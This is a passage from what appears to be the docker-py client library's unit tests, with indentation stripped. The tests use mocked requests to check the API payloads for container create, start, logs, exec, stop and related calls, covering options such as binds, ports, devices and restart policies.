"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volume_string(self):
mount_dest = '/mnt'
self.client.create_container('busybox', ['ls', mount_dest],
volumes=mount_dest)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_ports(self):
self.client.create_container('busybox', 'ls',
ports=[1111, (2222, 'udp'), (3333,)])
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"ExposedPorts": {
"1111/tcp": {},
"2222/udp": {},
"3333/tcp": {}
},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_entrypoint(self):
self.client.create_container('busybox', 'hello',
entrypoint='cowsay entry')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["hello"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Entrypoint": ["cowsay", "entry"]}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpu_shares(self):
self.client.create_container('busybox', 'ls',
cpu_shares=5)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"CpuShares": 5}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpuset(self):
self.client.create_container('busybox', 'ls',
cpuset='0,1')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Cpuset": "0,1",
"CpusetCpus": "0,1"}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cgroup_parent(self):
self.client.create_container(
'busybox', 'ls', host_config=self.client.create_host_config(
cgroup_parent='test'
)
)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
data = json.loads(args[1]['data'])
self.assertIn('HostConfig', data)
self.assertIn('CgroupParent', data['HostConfig'])
self.assertEqual(data['HostConfig']['CgroupParent'], 'test')
def test_create_container_with_working_dir(self):
self.client.create_container('busybox', 'ls',
working_dir='/root')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"WorkingDir": "/root"}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_stdin_open(self):
self.client.create_container('busybox', 'true', stdin_open=True)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": true,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": true,
"OpenStdin": true, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volumes_from(self):
vol_names = ['foo', 'bar']
try:
self.client.create_container('busybox', 'true',
volumes_from=vol_names)
except docker.errors.DockerException:
self.assertTrue(
docker.utils.compare_version('1.10', self.client._version) >= 0
)
return
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['VolumesFrom'],
','.join(vol_names))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_empty_volumes_from(self):
self.client.create_container('busybox', 'true', volumes_from=[])
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertTrue('VolumesFrom' not in data)
def test_create_named_container(self):
self.client.create_container('busybox', 'true',
name='marisa-kirisame')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(args[1]['params'], {'name': 'marisa-kirisame'})
def test_create_container_with_mem_limit_as_int(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit=128.0
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string_with_k_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128k'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0 * 1024)
def test_create_container_with_mem_limit_as_string_with_m_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128m'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0 * 1024 * 1024)
def test_create_container_with_mem_limit_as_string_with_g_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128g'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(
data['HostConfig']['Memory'], 128.0 * 1024 * 1024 * 1024
)
def test_create_container_with_mem_limit_as_string_with_wrong_value(self):
self.assertRaises(
docker.errors.DockerException,
self.client.create_host_config, mem_limit='128p'
)
self.assertRaises(
docker.errors.DockerException,
self.client.create_host_config, mem_limit='1f28'
)
def test_start_container(self):
self.client.start(fake_api.FAKE_CONTAINER_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_none(self):
with pytest.raises(ValueError) as excinfo:
self.client.start(container=None)
self.assertEqual(
str(excinfo.value),
'image or container param is undefined',
)
with pytest.raises(ValueError) as excinfo:
self.client.start(None)
self.assertEqual(
str(excinfo.value),
'image or container param is undefined',
)
def test_start_container_regression_573(self):
self.client.start(**{'container': fake_api.FAKE_CONTAINER_ID})
def test_create_container_with_lxc_conf(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'],
{'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_lxc_conf_compat(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(
json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_ro(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": True
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:ro"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_rw(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": False
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:rw"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_mode(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"mode": "z",
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:z"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_mode_and_ro_error(self):
with pytest.raises(ValueError):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"mode": "z",
"ro": True,
}}
)
)
def test_create_container_with_binds_list(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds=[
"/tmp:/mnt/1:ro",
"/tmp:/mnt/2",
],
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = [
"/tmp:/mnt/1:ro",
"/tmp:/mnt/2",
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_port_binds(self):
self.maxDiff = None
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
data = json.loads(args[1]['data'])
port_bindings = data['HostConfig']['PortBindings']
self.assertTrue('1111/tcp' in port_bindings)
self.assertTrue('2222/tcp' in port_bindings)
self.assertTrue('3333/udp' in port_bindings)
self.assertTrue('4444/tcp' in port_bindings)
self.assertTrue('5555/tcp' in port_bindings)
self.assertTrue('6666/tcp' in port_bindings)
self.assertEqual(
[{"HostPort": "", "HostIp": ""}],
port_bindings['1111/tcp']
)
self.assertEqual(
[{"HostPort": "2222", "HostIp": ""}],
port_bindings['2222/tcp']
)
self.assertEqual(
[{"HostPort": "3333", "HostIp": ""}],
port_bindings['3333/udp']
)
self.assertEqual(
[{"HostPort": "", "HostIp": "127.0.0.1"}],
port_bindings['4444/tcp']
)
self.assertEqual(
[{"HostPort": "5555", "HostIp": "127.0.0.1"}],
port_bindings['5555/tcp']
)
self.assertEqual(len(port_bindings['6666/tcp']), 2)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_mac_address(self):
mac_address_expected = "02:42:ac:11:00:0a"
container = self.client.create_container(
'busybox', ['sleep', '60'], mac_address=mac_address_expected)
res = self.client.inspect_container(container['Id'])
self.assertEqual(mac_address_expected,
res['NetworkSettings']['MacAddress'])
def test_create_container_with_links(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links={link_path: alias}
)
)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_multiple_links(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links={
link_path + '1': alias + '1',
link_path + '2': alias + '2'
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = [
'path1:alias1', 'path2:alias2'
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_links_as_list_of_tuples(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links=[(link_path, alias)]
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_privileged(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(privileged=True)
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Privileged'] = True
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_with_lxc_conf(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
pytest.deprecated_call(call_start)
def test_start_container_with_lxc_conf_compat(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
pytest.deprecated_call(call_start)
def test_start_container_with_binds_ro(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
'/tmp': {
"bind": '/mnt',
"ro": True
}
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_binds_rw(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
'/tmp': {"bind": '/mnt', "ro": False}
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_port_binds(self):
self.maxDiff = None
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID, port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
})
pytest.deprecated_call(call_start)
def test_start_container_with_links(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, links={'path': 'alias'}
)
pytest.deprecated_call(call_start)
def test_start_container_with_multiple_links(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
links={
'path1': 'alias1',
'path2': 'alias2'
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_links_as_list_of_tuples(self):
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID,
links=[('path', 'alias')])
pytest.deprecated_call(call_start)
def test_start_container_privileged(self):
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID, privileged=True)
pytest.deprecated_call(call_start)
def test_start_container_with_dict_instead_of_id(self):
self.client.start({'Id': fake_api.FAKE_CONTAINER_ID})
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_restart_policy(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
restart_policy={
"Name": "always",
"MaximumRetryCount": 0
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['RestartPolicy'] = {
"MaximumRetryCount": 0, "Name": "always"
}
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_added_capabilities(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(cap_add=['MKNOD'])
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['CapAdd'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_dropped_capabilities(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(cap_drop=['MKNOD'])
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['CapDrop'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_devices(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
devices=['/dev/sda:/dev/xvda:rwm',
'/dev/sdb:/dev/xvdb',
'/dev/sdc']
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Devices'] = [
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvda',
'PathOnHost': '/dev/sda'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvdb',
'PathOnHost': '/dev/sdb'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/sdc',
'PathOnHost': '/dev/sdc'}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_dict(self):
labels_dict = {
six.text_type('foo'): six.text_type('1'),
six.text_type('bar'): six.text_type('2'),
}
self.client.create_container(
'busybox', 'true',
labels=labels_dict,
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_list(self):
labels_list = [
six.text_type('foo'),
six.text_type('bar'),
]
labels_dict = {
six.text_type('foo'): six.text_type(),
six.text_type('bar'): six.text_type(),
}
self.client.create_container(
'busybox', 'true',
labels=labels_list,
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_named_volume(self):
mount_dest = '/mnt'
volume_name = 'name'
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(
binds={volume_name: {
"bind": mount_dest,
"ro": False
}}),
volume_driver='foodriver',
)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['VolumeDriver'] = 'foodriver'
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["name:/mnt:rw"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_resize_container(self):
self.client.resize(
{'Id': fake_api.FAKE_CONTAINER_ID},
height=15,
width=120
)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/resize',
params={'h': 15, 'w': 120},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_rename_container(self):
self.client.rename(
{'Id': fake_api.FAKE_CONTAINER_ID},
name='foobar'
)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/rename',
params={'name': 'foobar'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_wait(self):
self.client.wait(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def test_wait_with_dict_instead_of_id(self):
self.client.wait({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = docker.Client(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = docker.Client(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http_unix_triple_slash(self):
c = docker.Client(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = docker.Client(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = docker.Client(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_logs(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
logs = self.client.logs(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_logs_with_dict_instead_of_id(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
logs = self.client.logs({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_log_streaming(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 1, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=True
)
def test_log_tail(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=False,
tail=10)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 10},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
def test_log_tty(self):
m = mock.Mock()
with mock.patch('docker.Client.inspect_container',
fake_inspect_container_tty):
with mock.patch('docker.Client._stream_raw_result',
m):
self.client.logs(fake_api.FAKE_CONTAINER_ID,
stream=True)
self.assertTrue(m.called)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 1, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=True
)
def test_diff(self):
self.client.diff(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_diff_with_dict_instead_of_id(self):
self.client.diff({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_port(self):
self.client.port({'Id': fake_api.FAKE_CONTAINER_ID}, 1111)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_stop_container(self):
timeout = 2
self.client.stop(fake_api.FAKE_CONTAINER_ID, timeout=timeout)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_stop_container_with_dict_instead_of_id(self):
timeout = 2
self.client.stop({'Id': fake_api.FAKE_CONTAINER_ID},
timeout=timeout)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_exec_create(self):
self.client.exec_create(fake_api.FAKE_CONTAINER_ID, ['ls', '-1'])
args = fake_request.call_args
self.assertEqual(
'POST',
args[0][0], url_prefix + 'containers/{0}/exec'.format(
fake_api.FAKE_CONTAINER_ID
)
)
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'AttachStdout': True,
'Container': fake_api.FAKE_CONTAINER_ID,
'Cmd': ['ls', '-1'],
'Privileged': False,
'AttachStdin': False,
'AttachStderr': True,
'User': ''
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_start(self):
self.client.exec_start(fake_api.FAKE_EXEC_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'exec/{0}/start'.format(
fake_api.FAKE_EXEC_ID
)
)
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'Detach': False,
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_inspect(self):
self.client.exec_inspect(fake_api.FAKE_EXEC_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'exec/{0}/json'.format(
fake_api.FAKE_EXEC_ID
)
)
def test_exec_resize(self):
self.client.exec_resize(fake_api.FAKE_EXEC_ID, height=20, width=60)
fake_request.assert_called_with(
'POST',
url_prefix + 'exec/{0}/resize'.format(fake_api.FAKE_EXEC_ID),
params={'h': 20, 'w': 60},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_pause_container(self):
self.client.pause(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/pause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_unpause_container(self):
self.client.unpause(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/unpause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_kill_container(self):
